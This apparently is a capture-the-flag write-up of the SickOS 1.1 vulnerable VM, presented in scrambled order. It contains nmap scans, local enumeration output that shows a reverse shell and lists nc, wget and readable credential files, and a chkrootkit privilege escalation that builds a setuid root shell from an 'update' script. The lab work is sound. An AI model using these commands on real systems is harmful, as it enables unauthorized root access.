drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Mar 30 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
-rwxr-xr-x 1 root root 730 Sep 13 2013 apt-xapian-index
-rwxr-xr-x 1 root root 907 Dec 28 2012 man-db

Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

### NETWORKING ##########################################
Network & IP info:
eth0 Link encap:Ethernet HWaddr 00:0c:29:98:f5:19
inet addr:192.168.1.9 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe98:f519/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:268 errors:0 dropped:0 overruns:0 frame:0
TX packets:201 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:142432 (142.4 KB) TX bytes:22042 (22.0 KB)
Interrupt:19 Base address:0x2000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

Nameserver(s):
nameserver 192.168.1.1

Default route:
default 192.168.1.1 0.0.0.0 UG 100 0 0 eth0

Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.9:56045 192.168.1.20:443 ESTABLISHED 984/php-cgi
tcp 0 0 192.168.1.9:80 192.168.1.20:48676 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -

Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:68 0.0.0.0:* -

### SERVICES #############################################
Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.5 0.1 3396 1832 ? Ss 09:41 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S 09:41 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 09:41 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/0:0]
root 5 0.0 0.0 0 0 ? S< 09:41 0:00 [kworker/0:0H]
root 6 0.1 0.0 0 0 ? S 09:41 0:00 [kworker/u16:0]
root 7 0.0 0.0 0 0 ? S 09:41 0:00 [migration/0]
root 8 0.0 0.0 0 0 ? S 09:41 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 09:41 0:00 [rcu_sched]
root 10 0.0 0.0 0 0 ? S 09:41 0:00 [watchdog/0]
root 11 0.0 0.0 0 0 ? S< 09:41 0:00 [khelper]
root 12 0.0 0.0 0 0 ? S 09:41 0:00 [kdevtmpfs]
root 13 0.0 0.0 0 0 ? S< 09:41 0:00 [netns]
root 14 0.0 0.0 0 0 ? S< 09:41 0:00 [writeback]
root 15 0.0 0.0 0 0 ? S< 09:41 0:00 [kintegrityd]
root 16 0.0 0.0 0 0 ? S< 09:41 0:00 [bioset]
root 17 0.0 0.0 0 0 ? S< 09:41 0:00 [kworker/u17:0]
root 18 0.0 0.0 0 0 ? S< 09:41 0:00 [kblockd]
root 19 0.0 0.0 0 0 ? S< 09:41 0:00 [ata_sff]
root 20 0.0 0.0 0 0 ? S 09:41 0:00 [khubd]
root 21 0.0 0.0 0 0 ? S< 09:41 0:00 [md]
root 22 0.0 0.0 0 0 ? S< 09:41 0:00 [devfreq_wq]
root 23 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/0:1]
root 25 0.0 0.0 0 0 ? S 09:41 0:00 [khungtaskd]
root 26 0.0 0.0 0 0 ? S 09:41 0:00 [kswapd0]
root 27 0.0 0.0 0 0 ? SN 09:41 0:00 [ksmd]
root 28 0.0 0.0 0 0 ? SN 09:41 0:00 [khugepaged]
root 29 0.0 0.0 0 0 ? S 09:41 0:00 [fsnotify_mark]
root 30 0.0 0.0 0 0 ? S 09:41 0:00 [ecryptfs-kthrea]
root 31 0.0 0.0 0 0 ? S< 09:41 0:00 [crypto]
root 43 0.0 0.0 0 0 ? S< 09:41 0:00 [kthrotld]
root 44 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:1]
root 45 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_0]
root 46 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_1]
root 47 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:2]
root 48 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:3]
root 49 0.0 0.0 0 0 ? S< 09:41 0:00 [dm_bufio_cache]
root 50 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:4]
root 69 0.0 0.0 0 0 ? S< 09:41 0:00 [deferwq]
root 70 0.0 0.0 0 0 ? S< 09:41 0:00 [charger_manager]
root 71 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/0:2]
root 193 0.0 0.0 0 0 ? S< 09:41 0:00 [mpt_poll_0]
root 208 0.0 0.0 0 0 ? S< 09:41 0:00 [mpt/0]
root 220 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_2]
root 221 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_3]
root 227 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_4]
root 229 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_5]
root 231 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_6]
root 232 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_7]
root 233 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_8]
root 234 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_9]
root 237 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_10]
root 238 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_11]
root 239 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_12]
root 240 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_13]
root 241 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_14]
root 242 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_15]
root 243 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_16]
root 244 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_17]
root 245 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_18]
root 246 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_19]
root 247 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_20]
root 248 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_21]
root 249 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_22]
root 250 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_23]
root 251 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_24]
root 252 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_25]
root 253 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_26]
root 254 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_27]
root 255 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_28]
root 256 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_29]
root 257 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_30]
root 258 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_31]
root 259 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:5]
root 260 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:6]
root 261 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:7]
root 262 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:8]
root 263 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:9]
root 264 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:10]
root 265 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:11]
root 266 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:12]
root 267 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:13]
root 268 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:14]
root 269 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:15]
root 270 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:16]
root 271 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:17]
root 272 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:18]
root 273 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:19]
root 274 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:20]
root 275 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:21]
root 276 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:22]
root 277 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:23]
root 278 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:24]
root 279 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:25]
root 280 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:26]
root 281 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:27]
root 282 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:28]
root 283 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:29]
root 284 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:30]
root 285 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:31]
root 286 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_32]
root 287 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:32]
root 379 0.0 0.0 0 0 ? S 09:41 0:00 [jbd2/sda1-8]
root 380 0.0 0.0 0 0 ? S< 09:41 0:00 [ext4-rsv-conver]
root 381 0.0 0.0 0 0 ? S< 09:41 0:00 [ext4-unrsv-conv]
root 469 0.0 0.0 2832 608 ? S 09:41 0:00 upstart-udev-bridge --daemon
root 471 0.0 0.1 3080 1296 ? Ss 09:41 0:00 /sbin/udevd --daemon
102 547 0.0 0.0 3256 652 ? Ss 09:41 0:00 dbus-daemon --system --fork --activation=upstart
syslog 557 0.1 0.1 30036 1472 ? Sl 09:41 0:00 rsyslogd -c5
root 622 0.0 0.0 3020 812 ? S 09:41 0:00 /sbin/udevd --daemon
root 623 0.0 0.0 3020 812 ? S 09:41 0:00 /sbin/udevd --daemon
root 642 0.0 0.0 0 0 ? S< 09:41 0:00 [ttm_swap]
root 706 0.0 0.0 0 0 ? S< 09:41 0:00 [kpsmoused]
root 752 0.0 0.0 2844 348 ? S 09:41 0:00 upstart-socket-bridge --daemon
root 797 0.0 0.0 2924 404 ? Ss 09:41 0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root 819 0.0 0.2 6680 2400 ? Ss 09:41 0:00 /usr/sbin/sshd -D
root 899 0.0 0.0 4628 840 tty4 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty4
root 903 0.0 0.0 4628 836 tty5 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty5
root 907 0.0 0.0 4628 844 tty2 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty2
root 908 0.0 0.0 4628 832 tty3 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty3
root 912 0.0 0.0 4628 836 tty6 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty6
root 920 0.0 0.0 2616 884 ? Ss 09:41 0:00 cron
daemon 921 0.0 0.0 2468 348 ? Ss 09:41 0:00 atd
www-data 966 0.0 0.2 8272 2236 ? S 09:41 0:00 /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
www-data 968 0.0 0.4 17844 4720 ? Ss 09:41 0:00 /usr/bin/php-cgi
www-data 982 0.0 0.1 17844 1752 ? S 09:41 0:00 /usr/bin/php-cgi
www-data 983 0.0 0.1 17844 1752 ? S 09:41 0:00 /usr/bin/php-cgi
www-data 984 0.0 0.2 18100 3072 ? S 09:41 0:00 /usr/bin/php-cgi
www-data 985 0.0 0.1 17844 1752 ? S 09:41 0:00 /usr/bin/php-cgi
root 1003 0.0 0.0 4628 836 tty1 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty1
root 1187 0.0 0.0 22584 564 ? Ssl 09:41 0:00 /usr/sbin/vmware-vmblock-fuse -o subtype=vmware-vmblock,default_permissions,allow_other /var/run/vmblock-fuse
root 1206 0.1 0.5 11268 5660 ? S 09:41 0:00 /usr/sbin/vmtoolsd
root 1230 0.0 0.7 14736 7840 ? S 09:41 0:00 /usr/lib/vmware-vgauth/VGAuthService -s
www-data 1243 0.0 0.0 2232 544 ? S 09:41 0:00 sh -c uname -a; w; id; /bin/bash -i
www-data 1247 0.0 0.1 3448 1708 ? S 09:41 0:00 /bin/bash -i
www-data 3185 0.2 0.1 3412 1428 ? S 09:43 0:00 /bin/bash ./1.sh
www-data 3467 0.0 0.0 3384 644 ? S 09:43 0:00 /bin/bash ./1.sh
www-data 3468 0.0 0.1 2860 1032 ? R 09:43 0:00 ps aux

Process binaries & associated permissions (from above list):
-rwxr-xr-x 1 root root 920788 Mar 28 2013 /bin/bash
-rwxr-xr-x 2 root root 26696 Mar 29 2012 /sbin/getty
-rwxr-xr-x 1 root root 194528 Jan 18 2013 /sbin/init
-rwxr-xr-x 1 root root 177552 Jul 19 2013 /sbin/udevd
lrwxrwxrwx 1 root root 25 Apr 12 2016 /usr/bin/php-cgi -> /etc/alternatives/php-cgi
lrwxrwxrwx 1 root root 37 Mar 30 2016 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin32/appLoader
-rwxr-xr-x 1 root root 187332 Dec 20 2011 /usr/sbin/lighttpd
-rwxr-xr-x 1 root root 531776 Jan 13 2016 /usr/sbin/sshd
lrwxrwxrwx 1 root root 37 Mar 30 2016 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
lrwxrwxrwx 1 root root 37 Mar 30 2016 /usr/sbin/vmware-vmblock-fuse -> /usr/lib/vmware-tools/bin32/appLoader

/etc/init.d/ binary permissions:
total 144
drwxr-xr-x 2 root root 4096 Apr 12 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 0 Mar 30 2016 .legacy-bootordering
-rw-r--r-- 1 root root 2427 Jul 26 2012 README
-rwxr-xr-x 1 root root 4596 Sep 25 2012 apparmor
lrwxrwxrwx 1 root root 21 Oct 25 2011 atd -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2444 Jul 26 2012 bootlogd
lrwxrwxrwx 1 root root 21 Apr 19 2012 console-setup -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jun 19 2012 cron -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jun 13 2013 dbus -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Nov 26 2013 dmesg -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1242 Dec 13 2011 dns-clean
lrwxrwxrwx 1 root root 21 Mar 14 2012 friendly-recovery -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1105 Dec 15 2015 grub-common
-rwxr-xr-x 1 root root 1329 Jul 26 2012 halt
lrwxrwxrwx 1 root root 21 May 26 2011 hostname -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 29 2012 hwclock -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 29 2012 hwclock-save -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Feb 3 2012 irqbalance -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1293 Jul 26 2012 killprocs
-rwxr-xr-x 1 root root 2545 Aug 19 2010 lighttpd
lrwxrwxrwx 1 root root 21 Nov 20 2011 module-init-tools -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Sep 19 2013 network-interface -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Sep 19 2013 network-interface-container -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Sep 19 2013 network-interface-security -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2797 Feb 13 2012 networking
-rwxr-xr-x 1 root root 882 Jul 26 2012 ondemand
lrwxrwxrwx 1 root root 21 Sep 12 2012 passwd -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-log -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-ready -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-splash -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-stop -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 May 16 2013 plymouth-upstart-bridge -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 561 Feb 4 2011 pppd-dns
lrwxrwxrwx 1 root root 21 Oct 28 2013 procps -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 8635 Jul 26 2012 rc
-rwxr-xr-x 1 root root 801 Jul 26 2012 rc.local
-rwxr-xr-x 1 root root 117 Jul 26 2012 rcS
-rwxr-xr-x 1 root root 639 Jul 26 2012 reboot
lrwxrwxrwx 1 root root 21 Sep 8 2012 resolvconf -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 4395 Nov 8 2011 rsync
lrwxrwxrwx 1 root root 21 Nov 26 2013 rsyslog -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 4321 Jul 26 2012 sendsigs
lrwxrwxrwx 1 root root 21 Apr 19 2012 setvtrgb -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 590 Jul 26 2012 single
-rw-r--r-- 1 root root 4304 Jul 26 2012 skeleton
-rwxr-xr-x 1 root root 4371 Jan 13 2016 ssh
-rwxr-xr-x 1 root root 567 Jul 26 2012 stop-bootlogd
-rwxr-xr-x 1 root root 1143 Jul 26 2012 stop-bootlogd-single
-rwxr-xr-x 1 root root 700 May 23 2012 sudo
lrwxrwxrwx 1 root root 21 Jul 19 2013 udev -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udev-fallback-graphics -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udev-finish -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udevmonitor -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udevtrigger -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Apr 5 2012 ufw -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2800 Jul 26 2012 umountfs
-rwxr-xr-x 1 root root 2211 Jul 26 2012 umountnfs.sh
-rwxr-xr-x 1 root root 2926 Jul 26 2012 umountroot
-rwxr-xr-x 1 root root 1985 Jul 26 2012 urandom

### SOFTWARE #############################################
Sudo version:
Sudo version 1.8.3p1

### INTERESTING FILES ####################################
Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc

Installed compilers:
ii gcc 4:4.6.3-1ubuntu5 GNU C compiler
ii gcc-4.6 4.6.3-1ubuntu5 GNU C compiler

Can we read/write sensitive files:
-rw-r--r-- 1 root root 953 Apr 12 2016 /etc/passwd
-rw-r--r-- 1 root root 620 Mar 30 2016 /etc/group
-rw-r--r-- 1 root root 665 Mar 30 2016 /etc/profile
-rw-r----- 1 root shadow 810 Apr 25 2016 /etc/shadow

Can't search *.conf files as no keyword was entered

Can't search *.log files as no keyword was entered

Can't search *.ini files as no keyword was entered

All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 604 Oct 19 2011 /etc/deluser.conf
-rw-r--r-- 1 root root 350 Mar 30 2016 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 552 Feb 8 2012 /etc/pam.conf
-rw-r--r-- 1 root root 144 Mar 30 2016 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1260 May 2 2011 /etc/ucf.conf
-rw-r--r-- 1 root root 3343 Sep 30 2013 /etc/gai.conf
-rw-r--r-- 1 root root 92 Apr 19 2012 /etc/host.conf
-rw-r--r-- 1 root root 321 Mar 29 2012 /etc/blkid.conf
-rw-r--r-- 1 root root 475 Apr 19 2012 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2083 Oct 16 2013 /etc/sysctl.conf
-rw-r--r-- 1 root root 1263 Sep 5 2013 /etc/rsyslog.conf
-rw-r--r-- 1 root root 4728 May 2 2012 /etc/hdparm.conf
-rw-r----- 1 root fuse 216 Oct 18 2011 /etc/fuse.conf
-rw-r--r-- 1 root root 56 Apr 12 2016 /etc/chkrootkit.conf
-rw-r--r-- 1 root root 2981 Mar 30 2016 /etc/adduser.conf
-rw-r--r-- 1 root root 6961 Mar 30 2016 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 956 Mar 30 2012 /etc/mke2fs.conf
-rw-r--r-- 1 root root 333 Mar 30 2016 /etc/updatedb.conf
-rw-r--r-- 1 root root 599 Oct 4 2011 /etc/logrotate.conf
-rw-r--r-- 1 root root 2969 Mar 15 2012 /etc/debconf.conf
-rw-r--r-- 1 root root 15752 Jul 25 2009 /etc/ltrace.conf
-rw-r--r-- 1 root root 34 Mar 30 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 839 Apr 9 2012 /etc/insserv.conf

Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Mar 30 2016 .
drwxr-xr-x 12 root root 4096 Apr 26 2016 ..

### SCAN COMPLETE ####################################
www-data@ubuntu:/tmp$

dpkg -l | grep chkrootkit
rc chkrootkit 0.49-4ubuntu1.1 rootkit detector

echo 'int main(void)' > test.c
echo '{ ' >> test.c
echo 'setgid(0);' >> test.c
echo 'setuid(0);' >> test.c
echo 'execl("/bin/sh", "sh", 0);' >> test.c
echo '}' >> test.c

echo '#!/bin/bash' > update
echo 'chown root /tmp/test' >> update
echo 'chgrp root /tmp/test' >> update
echo 'chmod u+s /tmp/test' >> update

gcc test.c -o test
gcc test.c -o test
test.c: In function 'main':
test.c:5:1: warning: incompatible implicit declaration of built-in function 'execl' [enabled by default]
test.c:5:1: warning: missing sentinel in function call [-Wformat]

www-data@ubuntu:/tmp$ run-parts

drwxr-xr-x 22 root root 4096 Mar 30 2016 ..
-rwxr-xr-x 1 www-data www-data 40155 Jan 5 09:42 1.sh
-rw-r--r-- 1 www-data www-data 40155 Jan 5 09:43 2.py
-rw-r--r-- 1 www-data www-data 36801 Jan 5 09:43 3.sh
-rw-r--r-- 1 www-data www-data 5123 Jan 5 09:48 37292.c
drwxrwxrwt 2 root root 4096 Jan 5 09:41 VMwareDnD
srwxr-xr-x 1 www-data www-data 0 Jan 5 09:41 php.socket-0
-rwsrwxrwx 1 root root 7235 Jan 5 09:59 test
-rw-rw-rw- 1 www-data www-data 69 Jan 5 09:56 test.c
-rw-rw-rw- 1 www-data www-data 2 Jan 5 09:55 test.cls
-rwxrwxrwx 1 www-data www-data 74 Jan 5 09:57 update
-rw-rw-rw- 1 www-data www-data 20 Jan 5 09:56 updatels
-rw-r--r-- 1 root root 1600 Jan 5 09:41 vgauthsvclog.txt.0
drwx------ 2 root root 4096 Jan 5 09:41 vmware-root

www-data@ubuntu:/tmp$ ./test
./test
whoami
root

Regards,
Yuriy Stanchev/URIX

SickOS 1.1

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of SickOs 1.1 vulnarable VM:

https://www.vulnhub.com/entry/sickos-11,132/

Home brewed tools used: https://github.com/iuristanchev/pentesting_tools
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.9 00:0c:29:41:9f:01 14 840 VMware, Inc.

/nmap.sh 192.168.1.9

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Initiating ARP Ping Scan at 20:26
Scanning 192.168.1.9 [1 port]
Completed ARP Ping Scan at 20:26, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:26
Completed Parallel DNS resolution of 1 host. at 20:26, 0.10s elapsed
Nmap scan report for 192.168.1.9
Host is up (0.00017s latency).
MAC Address: 00:0C:29:41:9F:01 (VMware)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
Raw packets sent: 1 (28B) | Rcvd: 1 (28B)

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00011s latency).
PORT STATE SERVICE
80/tcp filtered http
MAC Address: 00:0C:29:41:9F:01 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00016s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
MAC Address: 00:0C:29:41:9F:01 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00012s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
MAC Address: 00:0C:29:41:9F:01 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00046s latency).
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
23/tcp filtered telnet
25/tcp filtered smtp
53/tcp filtered domain
80/tcp filtered http
110/tcp filtered pop3
111/tcp filtered rpcbind
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
143/tcp filtered imap
443/tcp filtered https
445/tcp filtered microsoft-ds
993/tcp filtered imaps
995/tcp filtered pop3s
1723/tcp filtered pptp
3306/tcp filtered mysql
3389/tcp filtered ms-wbt-server
5900/tcp filtered vnc
8080/tcp closed http-proxy
MAC Address: 00:0C:29:41:9F:01 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.46 ms 192.168.1.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00015s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open http-proxy Squid http proxy 3.1.19
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:GET
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 00:0C:29:41:9F:01 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.44 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
